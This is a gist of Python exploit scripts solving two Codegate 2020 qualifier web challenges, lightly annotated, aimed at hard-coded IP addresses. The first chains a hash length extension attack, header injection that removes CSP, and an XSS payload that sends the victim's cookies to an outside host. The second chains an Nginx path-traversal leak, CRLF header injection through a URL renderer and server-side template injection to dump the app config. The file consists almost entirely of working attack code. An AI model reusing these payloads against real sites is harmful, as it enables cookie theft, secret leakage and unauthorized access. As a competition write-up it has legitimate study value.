
@shpik-kr
Last active February 10, 2020 03:39
Codegate 2020 Quals Web Exploit code
'''
1. hash length extension: Make multi query.
2. header injection: remove the CSP header so the XSS fires
'''
import socket

import hashpumpy
import requests
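def b64e(x):
    """Base64-encode the Python 2 str *x* and drop the newlines the codec inserts."""
    return x.encode('base64').replace('\n', '')


# MAC the server issued for `origin`. The length-extension step below derives a
# valid MAC for `origin` + glue padding + `add` without knowing the secret prefix;
# this only works because the signature is an unkeyed Merkle-Damgard hash over
# secret||message rather than an HMAC.
h = '9324c43e76bdfb789eebe82870f2d1a8'
# Signed query as served: base64 of "header", "Vary", "*" joined by commas.
origin = 'aGVhZGVy,VmFyeQ==,Kg=='
# Script that ends up in the injected response body (kept byte-for-byte from the
# original); it reports document.cookie to the author's host.
payload = '<script\n>location.href="//mashiro.kr?"+document.cookie;</script\n>'

# Extra records appended after the original query. The record layout
# (`|`-separated records, comma-separated base64 fields) is inferred from
# `origin`; confirm against the challenge source.
add = '|'
# Per the gist notes this record is the header-injection step that drops the CSP
# header; the server-side mechanism is not visible here.
add += b64e('header') + ',' + b64e('HTTP/1.1') + ',' + b64e('100 Continue') + '|'
# A complete HTTP response (with Content-Length) carrying `payload`.
body_text = ('HTTP/1.1 200 OK\r\nHost: 127.0.0.1\r\nContent-Type: text/html\r\n'
             'Content-Length: ' + str(len(payload)) + '\r\n\r\n' + payload + '\r\n')
add += b64e('body') + ',' + b64e(body_text) + ',' + b64e('') + '|'

# Length of the secret the server prepends before hashing. The original defined
# this (misspelled) and then passed the literal 12; it is now actually used.
key_length = 12
new_hash, msg = hashpumpy.hashpump(h, origin, add, key_length)
# `msg` contains the raw padding bytes, so it is base64-encoded like the other fields.
encoded = b64e(msg)

host = "110.10.147.166"
port = 80
print 'http://%s/api.php?sig=%s&q=%s' % (host, new_hash, encoded)

# A raw socket is used rather than `requests`, presumably so the query string is
# sent exactly as built. NOTE(review): the request uses bare LF line endings and
# no blank line terminates the header block, as in the original; it relies on
# the server's leniency.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
data = '''GET /api.php?sig=%s&q=%s HTTP/1.1
Host: %s
''' % (new_hash, encoded, host)
s.send(data)
for _ in range(3):
    print repr(s.recv(1024))
# The original never closed the socket.
s.close()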
'''
1. Nginx misconfig: `http://[domain]/static../` leaks the source code.
2. CRLF: Send header for bypassing some condition about header.
3. SSTI: the log file is read back through `render_template_string`.
'''
import requests
def write_log(payload):
    """Ask the renderer to fetch a crafted admin URL and return the ticket number it reports.

    The crafted URL embeds *payload* in the `body` parameter and contains CRLF
    sequences, so the text after them is delivered as extra request lines (the
    gist's notes describe this as the CRLF step); the X-Forwarded-For value
    carries a `{{config}}` template expression that is evaluated later when the
    log is rendered. Raises IndexError if the response has no 'ticket no ' marker.
    """
    renderer = "http://110.10.147.169/renderer/"
    crafted = "http://127.0.0.1/renderer/admin?body="+payload+" HTTP/1.1\x0d\x0aHost: 127.0.0.2\x0d\x0aX-Forwarded-For: 127.0.0.2,{{config}}\r\nx:"
    response = requests.post(renderer, data={"url": crafted})
    # Everything after the first 'ticket no ' marker, cut at the first newline.
    after_marker = response.text.split('ticket no ')[1]
    return after_marker.split('\n')[0]
def read_log(ticket):
    """Have the renderer open the admin ticket page for *ticket* and print the response body.

    The URL carries CRLF sequences followed by the User-Agent, X-Forwarded-For and
    Host header lines the admin endpoint appears to require (the gist's notes call
    this "bypassing some condition about header"); rendering the ticket evaluates
    the template expression planted by write_log.
    """
    renderer = "http://110.10.147.169/renderer/"
    crafted = "http://127.0.0.1/renderer/admin/ticket?ticket="+ticket+" HTTP/1.1\x0d\x0aUser-Agent: AdminBrowser/1.337\r\nX-Forwarded-For: 127.0.0.1\r\nHost: 127.0.0.1\r\n\r\nX"
    response = requests.post(renderer, data={"url": crafted})
    print response.text
def file_check(ticket):
    """Print the raw ticket file fetched through the `static../` path (the Nginx misconfig in the notes)."""
    ticket_file_url = 'http://110.10.147.169/static../tickets/' + ticket
    print requests.get(ticket_file_url).text
# Driver: plant the `{{config}}` probe, then show the raw ticket file and the rendered log.
payload = "{{config}}"
ticket = write_log(payload=payload)
print 'ticket no %s' % ticket
file_check(ticket)
read_log(ticket)